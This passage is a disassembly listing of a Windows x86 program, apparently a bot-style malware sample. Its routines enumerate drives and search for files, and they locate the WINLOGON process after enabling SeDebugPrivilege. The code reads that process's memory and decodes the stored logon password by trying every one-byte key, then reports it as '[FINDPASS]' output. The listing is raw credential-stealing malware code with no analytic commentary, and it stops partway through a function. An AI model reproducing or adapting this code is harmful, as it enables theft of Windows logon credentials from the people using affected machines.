lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_403380
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_403380
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_403380
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_417390
push edx
push eax
call sub_4031A4
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_416BCD
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_417390
push edx
push eax
call sub_4031A4
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_416BCD
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_417390
push edx
push eax
call sub_4031A4
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_416BCD
add esp, 18h
pop ebx
jmp short loc_4033AF
; ---------------------------------------------------------------------------
loc_403380: ; CODE XREF: sub_4032A8+2C�j
; sub_4032A8+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_416975
lea eax, [ebp+var_130]
push esi
push eax
call sub_416975
lea eax, [ebp+var_B0]
push esi
push eax
call sub_416975
add esp, 18h
loc_4033AF: ; CODE XREF: sub_4032A8+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4032A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C3 proc near ; CODE XREF: sub_403482+B�j
; sub_403482+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_4032A8
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_403423
push ebx
push ebx
call sub_403217
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_416BCD
add esp, 14h
jmp short loc_403457
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: sub_4033C3+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_403217
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_416BCD
add esp, 20h
loc_403457: ; CODE XREF: sub_4033C3+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
lea eax, [ebp+var_380]
push eax
call sub_401F0F
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4033C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403482 proc near ; CODE XREF: sub_409848+4CCF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_403492
pop ebp
jmp sub_4033C3
; ---------------------------------------------------------------------------
loc_403492: ; CODE XREF: sub_403482+8�j
push ebx
push esi
push eax
push eax
call dword_43A460 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_416E1F
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_43A460 ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
jz short loc_4034F5
push edi
loc_4034B9: ; CODE XREF: sub_403482+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4034DB
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4033C3
add esp, 10h
loc_4034DB: ; CODE XREF: sub_403482+45�j
mov eax, ebx
lea edx, [eax+1]
loc_4034E0: ; CODE XREF: sub_403482+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034E0
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_4034B9
mov ebx, [ebp+arg_C]
pop edi
loc_4034F5: ; CODE XREF: sub_403482+34�j
push ebx
call sub_416D07
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_403482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403500 proc near ; DATA XREF: sub_40FB4C+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43B26C
call dword_43A4D0 ; closesocket
call sub_4138A3
call dword_43A4DC ; WSACleanup
call dword_43A4DC ; WSACleanup
mov ebx, dword_422000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_422B00+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call dword_422048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call dword_422010 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_4035BF
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, dword_42202C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4035BF: ; CODE XREF: sub_403500+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_438AD0
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
sub_403500 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035E0 proc near ; CODE XREF: sub_4035E0+9E�p
; sub_403732+C3�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_1 ; "%s\\*"
lea eax, [ebp+var_248]
push esi
push eax
call sub_416BCD
mov edi, dword_422054
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_40369D
loc_40362C: ; CODE XREF: sub_4035E0+BB�j
test [ebp+var_144], 10h
jz short loc_403689
cmp [ebp+var_118], 2Eh
jnz short loc_403650
cmp [ebp+var_117], 0
jz short loc_403689
cmp [ebp+var_117], 2Eh
jz short loc_403689
loc_403650: ; CODE XREF: sub_4035E0+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx
push esi
push eax
call sub_416BCD
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4035E0
add esp, 2Ch
mov [ebp+arg_14], eax
loc_403689: ; CODE XREF: sub_4035E0+53�j
; sub_4035E0+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call dword_422050 ; FindNextFileA
test eax, eax
jnz short loc_40362C
loc_40369D: ; CODE XREF: sub_4035E0+4A�j
push [ebp+var_4]
call dword_42204C ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_416BCD
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403723
loc_4036D4: ; CODE XREF: sub_4035E0+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_416BCD
push 1
push [ebp+arg_8]
lea eax, [ebp+var_54C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call dword_422050 ; FindNextFileA
test eax, eax
jnz short loc_4036D4
loc_403723: ; CODE XREF: sub_4035E0+F2�j
push esi
call dword_42204C ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_4035E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403732 proc near ; DATA XREF: sub_409848+319D�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A7h
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
lea edx, [eax+1]
xor ebx, ebx
loc_403765: ; CODE XREF: sub_403732+38�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403765
sub eax, edx
cmp [ebp+eax+var_115], 5Ch
jnz short loc_403791
lea eax, [ebp+var_114]
lea edx, [eax+1]
loc_403781: ; CODE XREF: sub_403732+54�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403781
sub eax, edx
mov [ebp+eax+var_115], bl
loc_403791: ; CODE XREF: sub_403732+44�j
lea eax, [ebp+var_218]
push eax
push offset aFindfileSearch ; "[FINDFILE]: Searching for file: %s."
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4037D6
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_405D62
add esp, 14h
loc_4037D6: ; CODE XREF: sub_403732+82�j
push ebx
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_C]
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_4035E0
push eax
lea eax, [ebp+var_49C]
push offset aFindfileFilesF ; "[FINDFILE]: Files found: %d."
push eax
call sub_416975
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_403834
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_405D62
add esp, 14h
loc_403834: ; CODE XREF: sub_403732+E0�j
lea eax, [ebp+var_49C]
push eax
call sub_401F0F
push [ebp+var_10]
call sub_4139F6
pop ecx
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_403732 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403852 proc near ; CODE XREF: sub_403E31+AB�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, dword_422060
push edi
mov ebx, 100h
push ebx
push 8
call esi ; GetProcessHeap
mov edi, dword_42205C
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4392D8 ; ZwQuerySystemInformation
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
push ecx
push eax
push ebp
push 10h
mov [esp+38h+var_C], eax
call dword_4392D8 ; ZwQuerySystemInformation
test eax, eax
jnz short loc_40393F
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_40393F
xor ecx, ecx
inc ecx
cmp eax, ecx
mov ebx, ebp
mov [esp+28h+var_18], ecx
jb short loc_40393F
loc_4038DB: ; CODE XREF: sub_403852+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_403932
push 0
push 0
call dword_439AE0 ; RtlCreateQueryDebugBuffer
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_439AE4 ; RtlQueryProcessDebugInformation
test eax, eax
jnz short loc_403923
mov eax, [edi+60h]
mov [esp+28h+var_8], eax
lea eax, [edi+80h]
push offset aWinlogon ; "WINLOGON"
push eax
call sub_4174C6
pop ecx
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz short loc_403957
loc_403923: ; CODE XREF: sub_403852+AA�j
test edi, edi
jz short loc_40392E
push edi
call dword_439AE8 ; RtlDestroyQueryDebugBuffer
loc_40392E: ; CODE XREF: sub_403852+D3�j
mov eax, [esp+28h+var_10]
loc_403932: ; CODE XREF: sub_403852+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_4038DB
loc_40393F: ; CODE XREF: sub_403852+6D�j
; sub_403852+7A�j ...
xor edi, edi
loc_403941: ; CODE XREF: sub_403852+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
mov eax, edi
loc_40394F: ; CODE XREF: sub_403852+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_403957: ; CODE XREF: sub_403852+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_4039C0
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_40396D: ; CODE XREF: sub_403852+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_4174C6
pop ecx
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz short loc_4039D4
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_4174C6
pop ecx
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz short loc_4039B2
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_4039B2: ; CODE XREF: sub_403852+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_40396D
loc_4039C0: ; CODE XREF: sub_403852+10F�j
test edi, edi
jz short loc_4039CB
push edi
call dword_439AE8 ; RtlDestroyQueryDebugBuffer
loc_4039CB: ; CODE XREF: sub_403852+170�j
mov edi, [esp+28h+var_4]
jmp loc_403941
; ---------------------------------------------------------------------------
loc_4039D4: ; CODE XREF: sub_403852+13C�j
xor eax, eax
jmp loc_40394F
sub_403852 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039DB proc near ; CODE XREF: sub_403E31+F0�p
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_33 = byte ptr -33h
var_2F = byte ptr -2Fh
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 68h
push esi
push [ebp+arg_0]
xor esi, esi
push esi
push 410h
mov [ebp+var_14], esi
call dword_422078 ; OpenProcess
cmp eax, esi
mov [ebp+var_8], eax
jnz short loc_403A04
xor eax, eax
jmp loc_403B76
; ---------------------------------------------------------------------------
loc_403A04: ; CODE XREF: sub_4039DB+20�j
mov eax, [ebp+arg_4]
push ebx
mov [eax], esi
push edi
lea eax, [ebp+var_68]
push eax
call dword_422074 ; GetSystemInfo
push [ebp+var_64]
mov [ebp+var_C], esi
mov esi, dword_422060
push 8
call esi ; GetProcessHeap
mov edi, dword_42205C
push eax
call edi ; RtlAllocateHeap
mov ebx, dword_422070
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_64]
mov [ebp+var_4], eax
push eax
push 7FFDF000h
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_403A54
xor esi, esi
jmp loc_403B69
; ---------------------------------------------------------------------------
loc_403A54: ; CODE XREF: sub_4039DB+70�j
push 1Ch
lea eax, [ebp+var_44]
push eax
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_8]
call dword_42206C ; VirtualQueryEx
test eax, eax
jz loc_403B58
test [ebp+var_33], 10h
jz loc_403B58
test [ebp+var_2F], 1
jnz loc_403B58
push [ebp+var_38]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_38]
mov eax, [ebp+var_4]
push edi
push dword ptr [eax+18h]
mov [ebp+var_10], edi
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_403B58
loc_403AAF: ; CODE XREF: sub_4039DB+108�j
push edi
push offset dword_438AD8
call sub_42193C
test eax, eax
pop ecx
pop ecx
jnz short loc_403AD7
lea eax, [edi+200h]
push eax
push offset dword_4392E0
call sub_42193C
test eax, eax
pop ecx
pop ecx
jz short loc_403AE7
loc_403AD7: ; CODE XREF: sub_4039DB+E3�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_10]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_403AAF
jmp short loc_403B58
; ---------------------------------------------------------------------------
loc_403AE7: ; CODE XREF: sub_4039DB+FA�j
test edi, edi
jz short loc_403B58
lea eax, [ebp+var_18]
push eax
lea eax, [edi+410h]
push eax
call dword_422068 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_403B24
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
call dword_422064 ; FileTimeToSystemTime
test eax, eax
jz short loc_403B24
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_403B24: ; CODE XREF: sub_4039DB+123�j
; sub_4039DB+135�j
movzx eax, byte ptr [edi+42Dh]
mov dword_439AF8, eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
sub eax, [ebp+var_10]
mov [ebp+var_14], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_439AF0, eax
mov dword_439AF4, edi
loc_403B58: ; CODE XREF: sub_4039DB+90�j
; sub_4039DB+9A�j ...
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
mov esi, [ebp+var_14]
loc_403B69: ; CODE XREF: sub_4039DB+74�j
push [ebp+var_8]
call dword_42202C ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_403B76: ; CODE XREF: sub_4039DB+24�j
pop esi
leave
retn
sub_4039DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B79 proc near ; CODE XREF: sub_403E31:loc_403F28�p
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_17 = byte ptr -17h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push [ebp+arg_0]
push 0
push 410h
call dword_422078 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jnz short loc_403B98
leave
retn
; ---------------------------------------------------------------------------
loc_403B98: ; CODE XREF: sub_403B79+1B�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+var_50]
push eax
call dword_422074 ; GetSystemInfo
mov eax, [ebp+var_44]
mov ebx, [ebp+var_48]
cmp ebx, eax
mov [ebp+var_10], eax
jnb loc_403C58
mov edi, dword_422060
loc_403BC2: ; CODE XREF: sub_403B79+D9�j
push 1Ch
lea eax, [ebp+var_2C]
push eax
push ebx
push [ebp+var_4]
call dword_42206C ; VirtualQueryEx
test eax, eax
jz short loc_403C46
test [ebp+var_1B], 10h
mov eax, [ebp+var_20]
mov [ebp+var_8], eax
jz short loc_403C4C
test [ebp+var_17], 1
jnz short loc_403C4C
push eax
push 8
call edi ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
and [ebp+var_C], 0
mov esi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_20]
push esi
push ebx
push [ebp+var_4]
call dword_422070 ; ReadProcessMemory
test eax, eax
jz short loc_403C38
push offset dword_438AD8
push esi
call sub_42193C
test eax, eax
pop ecx
pop ecx
jnz short loc_403C38
lea eax, [esi+400h]
push offset dword_4392E0
push eax
call sub_42193C
test eax, eax
pop ecx
pop ecx
jz short loc_403C6A
loc_403C38: ; CODE XREF: sub_403B79+95�j
; sub_403B79+A6�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
jmp short loc_403C4C
; ---------------------------------------------------------------------------
loc_403C46: ; CODE XREF: sub_403B79+5B�j
mov eax, [ebp+var_4C]
mov [ebp+var_8], eax
loc_403C4C: ; CODE XREF: sub_403B79+67�j
; sub_403B79+6D�j ...
add ebx, [ebp+var_8]
cmp ebx, [ebp+var_10]
jb loc_403BC2
loc_403C58: ; CODE XREF: sub_403B79+3D�j
xor esi, esi
loc_403C5A: ; CODE XREF: sub_403B79+123�j
push [ebp+var_4]
call dword_42202C ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C6A: ; CODE XREF: sub_403B79+BD�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_439AF0, ebx
mov dword_439AF4, eax
cmp [eax], cl
jnz short loc_403C8C
cmp [eax+1], cl
jz short loc_403C94
loc_403C8C: ; CODE XREF: sub_403B79+10C�j
; sub_403B79+119�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_403C8C
loc_403C94: ; CODE XREF: sub_403B79+111�j
mov eax, [ebp+arg_4]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_403C5A
sub_403B79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C9E proc near ; CODE XREF: sub_403E31+134�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_439AEC
add eax, eax
push ebx
mov ebx, dword_422060
mov [ebp+var_8], ax
add eax, 2
push esi
mov [ebp+var_6], ax
movzx eax, ax
push edi
push eax
push 8
call ebx ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
mov ecx, dword_439AEC
mov esi, dword_439AF4
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov [ebp+var_4], edi
xor eax, eax
rep movsw
mov al, byte ptr dword_439AF8
push eax
call dword_4392DC ; RtlRunDecodeUnicodeString
push [ebp+var_4]
mov esi, offset dword_439B00
push offset dword_438AD8
push offset dword_4392E0
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push esi
call sub_416BCD
add esp, 1Ch
push [ebp+var_4]
push 0
call ebx ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_403C9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D30 proc near ; CODE XREF: sub_403E31:loc_403F6C�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_439AEC
add eax, eax
push ebx
mov [ebp+var_C], ax
add eax, 2
push esi
mov [ebp+var_A], ax
movzx eax, ax
push edi
push eax
push 8
call dword_422060 ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
and [ebp+var_4], 0
mov [ebp+var_8], eax
mov ebx, offset dword_439D00
loc_403D6A: ; CODE XREF: sub_403D30+E2�j
mov ecx, dword_439AEC
mov esi, dword_439AF4
mov edi, [ebp+var_8]
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
rep movsw
call dword_4392DC ; RtlRunDecodeUnicodeString
mov eax, dword_439AEC
mov esi, [ebp+var_8]
xor edx, edx
inc edx
xor edi, edi
test eax, eax
jbe short loc_403DC3
loc_403D9A: ; CODE XREF: sub_403D30+8D�j
test edx, edx
jz short loc_403DE8
mov cl, [esi]
test cl, cl
jz short loc_403DB6
cmp byte ptr [esi+1], 0
jnz short loc_403DB6
cmp cl, 20h
jnb short loc_403DB1
xor edx, edx
loc_403DB1: ; CODE XREF: sub_403D30+7D�j
cmp cl, 7Eh
jbe short loc_403DB8
loc_403DB6: ; CODE XREF: sub_403D30+72�j
; sub_403D30+78�j
xor edx, edx
loc_403DB8: ; CODE XREF: sub_403D30+84�j
inc esi
inc esi
inc edi
cmp edi, eax
jb short loc_403D9A
test edx, edx
jz short loc_403DE8
loc_403DC3: ; CODE XREF: sub_403D30+68�j
push [ebp+var_8]
push offset dword_438AD8
push offset dword_4392E0
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_416BCD
add esp, 1Ch
jmp short loc_403E08
; ---------------------------------------------------------------------------
loc_403DE8: ; CODE XREF: sub_403D30+6C�j
; sub_403D30+91�j
push offset dword_438AD8
push offset dword_4392E0
push [ebp+arg_0]
push offset aFindpassTheW_0 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_416BCD
add esp, 18h
loc_403E08: ; CODE XREF: sub_403D30+B6�j
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
jbe loc_403D6A
push [ebp+var_8]
push 0
call dword_422060 ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_403D30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_403E31 proc near ; DATA XREF: sub_409848+4737�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 29Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_412A3C
cmp eax, esi
mov [ebp+74h+var_4], eax
jz short loc_403E70
cmp eax, 2
jz short loc_403E70
push offset aFindpassOnlySu ; "[FINDPASS]: Only supported on Windows N"...
jmp loc_403FAD
; ---------------------------------------------------------------------------
loc_403E70: ; CODE XREF: sub_403E31+2E�j
; sub_403E31+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408CDE
test eax, eax
pop ecx
pop ecx
jz loc_403FA8
push offset aNtdll_dll ; "NTDLL.DLL"
call dword_422088 ; LoadLibraryA
mov esi, dword_422084
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+74h+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4392D8, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_439AE0, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_439AE4, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_439AE8, eax
call esi ; GetProcAddress
